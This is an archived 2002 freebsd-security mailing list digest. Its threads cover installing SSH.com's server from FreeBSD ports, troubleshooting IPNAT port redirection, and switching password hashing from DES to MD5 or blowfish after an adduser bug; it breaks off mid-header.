<20020925203950.81300.qmail@web10106.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020925203950.81300.qmail@web10106.mail.yahoo.com> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ssh.com is /usr/ports/security/ssh2 [sirmoo@cowbert]:/usr/ports/security/ssh2 % cat pkg-descr SSH Protocols and Secure Shell Secure Shell is the secure login program that revolutionized remote management of networks hosts over the Internet. It is a powerful, very easy-to-use program that uses strong cryptography for protecting all transmitted confidential data, including passwords, binary files, and administrative commands. The benefits of SSH include: o Automatic authentication of users, no passwords sent in cleartext to prevent the stealing of passwords. o Multiple strong authentication methods that prevent such security threats as spoofing identity. o Authentication of both ends of connection, the server and the client are authenticated to prevent identity spoofing, trojan horses, etc. o Automatic authentication using agents to enable strong authentication to multiple systems with a single-sign-on. o Encryption and compression of data for security and speed. o Secure file transfer. o Tunneling and encryption of arbitrary connections. WWW: http://www.ssh.com/ The problem now, is that i don't know if you can do a -D_OVERWRITE BASE or tricks to get it to overwrite the ossh that comes with the base install. Someone else on -ports shoudl be able to help with that. On Wed, Sep 25, 2002 at 01:39:50PM -0700, twig les wrote: > I'm switching this discussion to security because I > think it's a better fit. My bad for not doing it to > begin with. > > ====================================================== > Does this mean that the ssh.com server is installed? > I need the proprietary daemon to compile and run > instead of OpenSSH. Someone has to have done this > already. > > > --- Giorgos Keramidas > wrote: > > On 2002-09-25 11:09, twig les > > wrote: > > > Has anyone compiled and run SSH.com's ssh server > > on > > > FreeBSD? Specifically the boxes are running 4.6 > > > release (fully patched of course :) and we will be > > > using secureID. The base install is user (locked > > down > > > from there). > > > > You can always use the ports :-) > > > > : keramida@hades[23:23]/home/keramida$ ls -ld > > /usr/ports/security/ssh* > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh > > : drwxr-xr-x 3 root wheel 512 Sep 24 04:06 > > /usr/ports/security/ssh-gui > > : drwxr-xr-x 3 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh-multiadd > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > /usr/ports/security/ssh2 > > > > -- > > Famous last words: "What duck?" -- (Terry Pratchett, > > Soul Music) > > > ===== > ----------------------------------------------------------- > Heavy metal made me do it. > ----------------------------------------------------------- > > __________________________________________________ > Do you Yahoo!? > New DSL Internet Access from SBC & Yahoo! > http://sbc.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology Yale University School of Medicine Center for Medical Informatics | Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 13:54:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8ADBD37B401; Wed, 25 Sep 2002 13:54:52 -0700 (PDT) Received: from isilon.com (isilon.com [65.101.129.58]) by mx1.FreeBSD.org (Postfix) with ESMTP id 05FCD43E77; Wed, 25 Sep 2002 13:54:52 -0700 (PDT) (envelope-from billy@isilon.com) Received: from mouse.isilon.com (mouse.isilon.com [172.16.5.50]) by isilon.com (8.12.2/8.11.1) with ESMTP id g8PKspUc024688; Wed, 25 Sep 2002 13:54:51 -0700 (PDT) (envelope-from billy@isilon.com) Date: Wed, 25 Sep 2002 13:53:50 -0700 (PDT) From: billy To: Juraj Petrik Cc: freebsd-security@FreeBSD.ORG, Subject: Re: IPNAT + IPFILTER + DUMMYNET + FreeBSD 4.7prerelease In-Reply-To: <002201c26467$1fdf9270$7a01a8c0@pcjuro> Message-ID: <20020925134615.V75126-100000@mouse.isilon.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry for the previous empty post. You don't seem to be using dummynet, ipfw, or ipdivert, so you should probably not have them turned on in the kernel. Are you sure that you don't have a rule that's blocking the redirect or the response from the relevant interfaces? I know that ipnat will not redirect packets out the same interface they came, but that doesn't seem to be a problem here. If you do an ipnat -l, do you see your rdr's in the listing, and do you see any active connections after you attempt to connect from the WAN side? -billy On Wed, 25 Sep 2002, Juraj Petrik wrote: > hello, > can you help me, please, > > I'm trying to run firewall with using > IPFilter, IPNAT and Dummynet, on FreeBSD > > I'm readed so much HOWTOs but, I can't do > redirection to another server in internal > network: > rl0 - WAN (194.x.x.0/24) 194.x.x.22 if FreeBSD box > rl1 - LAN (192.168.1.0/24) 192.168.1.22 if FreeBSD box > rl2 - DMZ (10.0.0.0/24) 10.0.0.22 if FreeBSD box > > my server is now on LAN, not on DMZ. > > I'm using FreeBSD 4.7 prerelease from CVS. > > In kernel config have added: > options IPFIREWALL > options IPFIREWALL_VERBOSE > options IPFIREWALL_VERBOSE_LIMIT=30 > options IPFIREWALL_FORWARD > options IPFIREWALL_DEFAULT_TO_ACCEPT > options IPDIVERT > options DUMMYNET > > options IPFILTER > options IPFILTER_LOG > options IPFILTER_DEFAULT_BLOCK > options RANDOM_IP_ID > > in /etc/rc.conf have: > tcp_extensions="YES" > gateway_enable="YES" > portmap_enable="NO" > > #firewall_enable="YES" > #firewall_type="/etc/dummynet.conf" > #firewall_logging="NO" > > ipfilter_enable="YES" > ipfilter_flags="" > ipfilter_rules="/etc/ipf.conf" > > ipnat_enable="YES" > ipnat_flags="" > ipnat_rules="/etc/ipnat.conf" > > ipmon_enable="YES" > ipmon_flags="-Dns -l block" > > in /etc/ipf.conf: > pass in log all > pass out log all > > in /etc/ipnat.conf: > map rl0 192.168.1.0/24 -> 194.x.x.22/32 > map rl0 0/0 -> 194.x.x.22/32 proxy port ftp ftp/tcp > > map rl0 192.168.1.0/24 -> 194.x.x.22/32 portmap tcp/udp 12500:60000 > map rl0 192.168.1.0/24 -> 194.x.x.22/32 > > rdr rl0 194.x.x.22/32 port 80 -> 192.168.1.35 port 80 > rdr rl0 194.x.x.22/32 port 22 -> 192.168.1.35 port 22 > > NAT from LAN to internet works OK, > but from Internet I can't redirct connect to server > on LAN (192.168.1.35) > > Please help me ANYBODY!!!! > -jp- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 14: 4: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2749237B401 for ; Wed, 25 Sep 2002 14:03:56 -0700 (PDT) Received: from web10102.mail.yahoo.com (web10102.mail.yahoo.com [216.136.130.52]) by mx1.FreeBSD.org (Postfix) with SMTP id D7FDB43E3B for ; Wed, 25 Sep 2002 14:03:55 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020925210354.73996.qmail@web10102.mail.yahoo.com> Received: from [68.5.49.41] by web10102.mail.yahoo.com via HTTP; Wed, 25 Sep 2002 14:03:54 PDT Date: Wed, 25 Sep 2002 14:03:54 -0700 (PDT) From: twig les Subject: Re: SSH.com on FreeBSD To: peter.lai@uconn.edu Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020925204750.GB17502@cowbert.2y.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I guess my confusion lies in my understanding that ssh.com's server was *not* free, thus would not ever be in the ports collection. I cruised around the ssh ports and checked them out but I'm still a little shaky. Am I wrong here? SSH.com made their ssh server freely available? --- "Peter C. Lai" wrote: > ssh.com is /usr/ports/security/ssh2 > > [sirmoo@cowbert]:/usr/ports/security/ssh2 % cat > pkg-descr > SSH Protocols and Secure Shell > > Secure Shell is the secure login program that > revolutionized remote > management of networks hosts over the Internet. It > is a powerful, > very easy-to-use program that uses strong > cryptography for protecting > all transmitted confidential data, including > passwords, binary files, > and administrative commands. > > The benefits of SSH include: > > o Automatic authentication of users, no passwords > sent in cleartext to > prevent the stealing of passwords. > o Multiple strong authentication methods that > prevent such security > threats as spoofing identity. > o Authentication of both ends of connection, the > server and the client > are authenticated to prevent identity spoofing, > trojan horses, etc. > o Automatic authentication using agents to enable > strong > authentication to multiple systems with a > single-sign-on. > o Encryption and compression of data for security > and speed. > o Secure file transfer. > o Tunneling and encryption of arbitrary connections. > > WWW: http://www.ssh.com/ > > The problem now, is that i don't know if you can do > a -D_OVERWRITE BASE > or tricks to get it to overwrite the ossh that comes > with the base install. > Someone else on -ports shoudl be able to help with > that. > > On Wed, Sep 25, 2002 at 01:39:50PM -0700, twig les > wrote: > > I'm switching this discussion to security because > I > > think it's a better fit. My bad for not doing it > to > > begin with. > > > > > ====================================================== > > Does this mean that the ssh.com server is > installed? > > I need the proprietary daemon to compile and run > > instead of OpenSSH. Someone has to have done this > > already. > > > > > > --- Giorgos Keramidas > > wrote: > > > On 2002-09-25 11:09, twig les > > > > wrote: > > > > Has anyone compiled and run SSH.com's ssh > server > > > on > > > > FreeBSD? Specifically the boxes are running > 4.6 > > > > release (fully patched of course :) and we > will be > > > > using secureID. The base install is user > (locked > > > down > > > > from there). > > > > > > You can always use the ports :-) > > > > > > : keramida@hades[23:23]/home/keramida$ ls -ld > > > /usr/ports/security/ssh* > > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > > /usr/ports/security/ssh > > > : drwxr-xr-x 3 root wheel 512 Sep 24 04:06 > > > /usr/ports/security/ssh-gui > > > : drwxr-xr-x 3 root wheel 512 Sep 13 22:16 > > > /usr/ports/security/ssh-multiadd > > > : drwxr-xr-x 4 root wheel 512 Sep 13 22:16 > > > /usr/ports/security/ssh2 > > > > > > -- > > > Famous last words: "What duck?" -- (Terry > Pratchett, > > > Soul Music) > > > > > > ===== > > > ----------------------------------------------------------- > > Heavy metal made me do it. > > > ----------------------------------------------------------- > > > > __________________________________________________ > > Do you Yahoo!? > > New DSL Internet Access from SBC & Yahoo! > > http://sbc.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > -- > Peter C. Lai > University of Connecticut > Dept. of Molecular and Cell Biology > Yale University School of Medicine > Center for Medical Informatics | Research Assistant > http://cowbert.2y.net/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Heavy metal made me do it. ----------------------------------------------------------- __________________________________________________ Do you Yahoo!? New DSL Internet Access from SBC & Yahoo! http://sbc.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 14:10:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B718737B401 for ; Wed, 25 Sep 2002 14:10:29 -0700 (PDT) Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30EFE43E4A for ; Wed, 25 Sep 2002 14:10:29 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: from odin.ac.hmc.edu (IDENT:brdavis@localhost.localdomain [127.0.0.1]) by odin.ac.hmc.edu (8.12.3/8.12.3) with ESMTP id g8PLARj1005000; Wed, 25 Sep 2002 14:10:27 -0700 Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.12.3/8.12.3/Submit) id g8PLAQeA004999; Wed, 25 Sep 2002 14:10:26 -0700 Date: Wed, 25 Sep 2002 14:10:26 -0700 From: Brooks Davis To: twig les Cc: peter.lai@uconn.edu, freebsd-security@FreeBSD.ORG Subject: Re: SSH.com on FreeBSD Message-ID: <20020925141026.A1896@Odin.AC.HMC.Edu> References: <20020925204750.GB17502@cowbert.2y.net> <20020925210354.73996.qmail@web10102.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tKW2IUtsqtDRztdT" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020925210354.73996.qmail@web10102.mail.yahoo.com>; from twigles@yahoo.com on Wed, Sep 25, 2002 at 02:03:54PM -0700 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) on odin.ac.hmc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tKW2IUtsqtDRztdT Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Sep 25, 2002 at 02:03:54PM -0700, twig les wrote: > I guess my confusion lies in my understanding that > ssh.com's server was *not* free, thus would not ever > be in the ports collection. I cruised around the ssh > ports and checked them out but I'm still a little > shaky. Am I wrong here? SSH.com made their ssh > server freely available? It used to be free for non-commercial use. I suspect it still is though I stopped using it list just about everyone else when OpenSSH came out so I'm not sure. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --tKW2IUtsqtDRztdT Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kiZCXY6L6fI4GtQRAuHzAKDYsCCB8oaKl1jThwexzRgsm5qqUACfZiRE S4nppS+W41miq32LfhAUhgY= =BxlE -----END PGP SIGNATURE----- --tKW2IUtsqtDRztdT-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 14:14:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF0CF37B401 for ; Wed, 25 Sep 2002 14:14:18 -0700 (PDT) Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by mx1.FreeBSD.org (Postfix) with SMTP id 4DD8B43E81 for ; Wed, 25 Sep 2002 14:14:17 -0700 (PDT) (envelope-from jake@iki.fi) Received: (qmail 45460 invoked by uid 11053); 25 Sep 2002 21:14:15 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Sep 2002 21:14:15 -0000 Date: Thu, 26 Sep 2002 00:14:14 +0300 (EEST) From: Jarkko Santala X-X-Sender: jake@trillian.santala.org To: twig les Cc: peter.lai@uconn.edu, Subject: Re: SSH.com on FreeBSD In-Reply-To: <20020925210354.73996.qmail@web10102.mail.yahoo.com> Message-ID: <20020926000753.B353-100000@trillian.santala.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 25 Sep 2002, twig les wrote: > I guess my confusion lies in my understanding that > ssh.com's server was *not* free, thus would not ever > be in the ports collection. I cruised around the ssh > ports and checked them out but I'm still a little > shaky. Am I wrong here? SSH.com made their ssh > server freely available? To make it clear and simple: Yes, its free. Please make sure you still read the whole license at: ftp://ftp.ssh.com/pub/ssh/LICENSE Someone could patch the pkg-descr to include information on the licensing so I wouldn't have to email about this every month. :) -jake -- Jarkko Santala http://www.iki.fi/~jake/ System Administrator 2001:670:83:f08::/64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 15:17:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D41E637B44B for ; Wed, 25 Sep 2002 15:17:21 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 7B41D43E4A for ; Wed, 25 Sep 2002 15:17:20 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 63335 invoked by uid 1017); 25 Sep 2002 22:17:19 -0000 Date: Thu, 26 Sep 2002 00:17:19 +0200 From: Nomad To: freebsd-security@freebsd.org Subject: Password encoding Message-ID: <20020925221718.GA63296@killer.crypton.pl> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello I'v upgraded my FreeBSD to 4.6.2 some time ago. Since that day I added some new accounts to my system. Everything was OK but... But some beautifull day I made mistake and I wrote shorter password than the good one. And what happend ? System let me in after succesful authorization !!! So I made small investigation. And what I found: new auth_default value in my system is DES !!! And my password on new accounts are only 8 characters long !!! If you'v done the same check your master.passwd if there are some DES encoded passwords. Because 8 character password without right password policy (with short paswords in mind) are VERY easy to brake. I know, I don't have to say that on this list, but writting about fundamental things is never in off. So, if I am alone with this problem: I am sorry, I'v had to done some mistake. But if not: so, I think that we have to do something with this... I upgraded my FreeBSD by buildworld/installworld from sources. Regards Nomad -- [%% If you dance with devil %%] [%% you don't changing him. %%] [%% The devil is the one %%] [%% who is changing you. %%] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 15:26:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A44D137B401 for ; Wed, 25 Sep 2002 15:26:51 -0700 (PDT) Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5191243E7B for ; Wed, 25 Sep 2002 15:26:51 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: from radix.cryptio.net (localhost [127.0.0.1]) by radix.cryptio.net (8.12.5/8.12.5) with ESMTP id g8PMQjLG063417 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 25 Sep 2002 15:26:46 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: (from emechler@localhost) by radix.cryptio.net (8.12.5/8.12.5/Submit) id g8PMQjFM063416; Wed, 25 Sep 2002 15:26:45 -0700 (PDT) Date: Wed, 25 Sep 2002 15:26:45 -0700 From: Erick Mechler To: Nomad Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password encoding Message-ID: <20020925222645.GJ45330@techometer.net> References: <20020925221718.GA63296@killer.crypton.pl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020925221718.GA63296@killer.crypton.pl> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :: So I made small investigation. And what I found: new auth_default value :: in my system is DES !!! And my password on new accounts are only 8 :: characters long !!! You're going to want to do 2 things. First, make sure that you have your passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb /etc/login.conf after you do so). Currently there's a bug with /usr/sbin/adduser which results in changed passwords defaulting to DES, despite whatever the system default password scheme is. /usr/sbin/pw and /usr/bin/passwd do not suffer from this problem. Bottom line: don't use adduser to set your passwords upon account creation, use the passwd utility or pw. This will insure that all your system passwords are created and stay MD5. Cheers - Erick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 25 15:34:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67A6F37B401 for ; Wed, 25 Sep 2002 15:34:10 -0700 (PDT) Received: from obsecurity.dyndns.org (adsl-64-165-226-88.dsl.lsan03.pacbell.net [64.165.226.88]) by mx1.FreeBSD.org (Postfix) with ESMTP id B232243E77 for ; Wed, 25 Sep 2002 15:34:09 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0A4BA66B28; Wed, 25 Sep 2002 15:34:08 -0700 (PDT) Date: Wed, 25 Sep 2002 15:34:08 -0700 From: Kris Kennaway To: Nomad Cc: freebsd-security@freebsd.org Subject: Re: Password encoding Message-ID: <20020925223408.GA15793@xor.obsecurity.org> References: <20020925221718.GA63296@killer.crypton.pl> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="G4iJoqBmSsgzjUCe" Content-Disposition: inline In-Reply-To: <20020925221718.GA63296@killer.crypton.pl> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --G4iJoqBmSsgzjUCe Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Sep 26, 2002 at 12:17:19AM +0200, Nomad wrote: > Hello >=20 > I'v upgraded my FreeBSD to 4.6.2 some time ago. Since that day I added so= me new accounts to my system. Everything was OK but... But some beautifull = day I made mistake and I wrote shorter password than the good one. And what= happend ? System let me in after succesful authorization !!! > So I made small investigation. And what I found: new auth_default value i= n my system is DES !!! And my password on new accounts are only 8 character= s long !!! > If you'v done the same check your master.passwd if there are some DES enc= oded passwords. Because 8 character password without right password policy = (with short paswords in mind) are VERY easy to brake. I know, I don't have = to say that on this list, but writting about fundamental things is never in= off. This is a documented limitation in DES password hashing. You should only use it if you need to maintain backwards compatibility of your password file with a legacy application/system. Kris --G4iJoqBmSsgzjUCe Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9kjnfWry0BWjoQKURAshcAKCILpzDGF9gkUJU++HQlG9Nwxy38QCePx/b 34/90GWzCDjSq28ZDEwpQ4M= =VFDS -----END PGP SIGNATURE----- --G4iJoqBmSsgzjUCe-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 1: 5: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A854937B401 for ; Thu, 26 Sep 2002 01:05:07 -0700 (PDT) Received: from unix.za.net (unix.za.net [137.158.96.78]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5F16E43E6E for ; Thu, 26 Sep 2002 01:05:04 -0700 (PDT) (envelope-from ukj@unix.za.net) X-Message-Flag: Your copy of Outlook will expire in 3 days. Please contact Microsoft about purchasing a new license. Remember: software piracy is a felony!" Received: from unix.za.net (ukj@localhost [IPv6:::1]) by unix.za.net (8.12.6/8.12.3) with ESMTP id g8Q84iNv050380; Thu, 26 Sep 2002 10:04:44 +0200 (SAST) (envelope-from ukj@unix.za.net) Received: (from ukj@localhost) by unix.za.net (8.12.3/8.12.6/Submit) id g8Q84cua050379; Thu, 26 Sep 2002 10:04:38 +0200 (SAST) Date: Thu, 26 Sep 2002 10:04:37 +0200 From: Todor Genov To: Erick Mechler Cc: freebsd-security@freebsd.org Subject: Re: Password encoding Message-ID: <20020926100437.A47704@unix.za.net> References: <20020925221718.GA63296@killer.crypton.pl> <20020925222645.GJ45330@techometer.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020925222645.GJ45330@techometer.net>; from emechler@techometer.net on Wed, Sep 25, 2002 at 03:26:45PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > You're going to want to do 2 things. First, make sure that you have your > passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb > /etc/login.conf after you do so). FreeBSD has had support for blowfish passwords for quite some time now. Just specify passwd_format=blf in login.conf. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 2:22:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5AA6537B401 for ; Thu, 26 Sep 2002 02:22:41 -0700 (PDT) Received: from sequel.rsm.ru (sequel.rsm.ru [217.23.86.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2C5B643E65 for ; Thu, 26 Sep 2002 02:22:38 -0700 (PDT) (envelope-from aga@sequel.rsm.ru) Received: (from aga@localhost) by sequel.rsm.ru (8.11.1/8.11.1/RSM-3.1-s-av) id g8Q9MYR23427 for freebsd-security@freebsd.org; Thu, 26 Sep 2002 13:22:34 +0400 (MSD) Message-Id: <200209260922.g8Q9MYR23427@sequel.rsm.ru> Subject: Re: Password encoding To: freebsd-security@freebsd.org Date: Thu, 26 Sep 2002 13:22:34 +0400 (MSD) From: Dmitry Agafonov Reply-To: aga@rsm.ru Organization: Radioservice Mobile Ltd, Saratov X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Todor Genov wrote: > > You're going to want to do 2 things. First, make sure that you have your > > passwd_format=md5 in your /etc/login.conf (be sure to run cap_mkdb > > /etc/login.conf after you do so). > > FreeBSD has had support for blowfish passwords for quite some time now. Just > specify passwd_format=blf in login.conf. > Ok, how about more common question. How do I ask system crypt() to use MD5 by default? /etc/make.conf or such? -- Dmitry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 2:55:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ACF8B37B401 for ; Thu, 26 Sep 2002 02:55:54 -0700 (PDT) Received: from amun.isnic.is (amun.isnic.is [193.4.58.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id F06CC43E91 for ; Thu, 26 Sep 2002 02:55:53 -0700 (PDT) (envelope-from oli@amun.isnic.is) Received: from amun.isnic.is (oli@localhost [127.0.0.1]) by amun.isnic.is (8.12.3/8.12.3/isnic) with ESMTP id g8Q9toIa032828; Thu, 26 Sep 2002 09:55:50 GMT (envelope-from oli@amun.isnic.is) Received: (from oli@localhost) by amun.isnic.is (8.12.3/8.12.3/Submit) id g8Q9tosD032827; Thu, 26 Sep 2002 09:55:50 GMT (envelope-from oli) Date: Thu, 26 Sep 2002 09:55:50 +0000 From: Olafur Osvaldsson To: Dmitry Agafonov Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password encoding Message-ID: <20020926095550.GB10763@isnic.is> Mail-Followup-To: Dmitry Agafonov , freebsd-security@FreeBSD.ORG References: <200209260922.g8Q9MYR23427@sequel.rsm.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200209260922.g8Q9MYR23427@sequel.rsm.ru> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dmitry, You should be able to set it in /etc/auth.conf, but that doesn't work for me. You can instead run crypt_set_format("md5") to set the default for your prog to md5 or blf for blowfish. You could also make sure that your salts start with $$ wich would then set the algorithm used in encryption, more info on this in the crypt(3) manpage. /Oli On Thu, 26 Sep 2002, Dmitry Agafonov wrote: > Ok, how about more common question. How do I ask system crypt() to use MD5 > by default? /etc/make.conf or such? > > -- > Dmitry > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Olafur Osvaldsson Systems Administrator Internet a Islandi hf. Tel: +354 525-5291 Email: oli@isnic.is To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 26 3:28:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8643B37B401; Thu, 26 Sep 2002 03:28:46 -0700 (PDT) Received: from mel-rto2.wanadoo.fr (smtp-out-2.wanadoo.fr [193.252.19.254]) by mx1.FreeBSD.org (Postfix) with ESMTP id 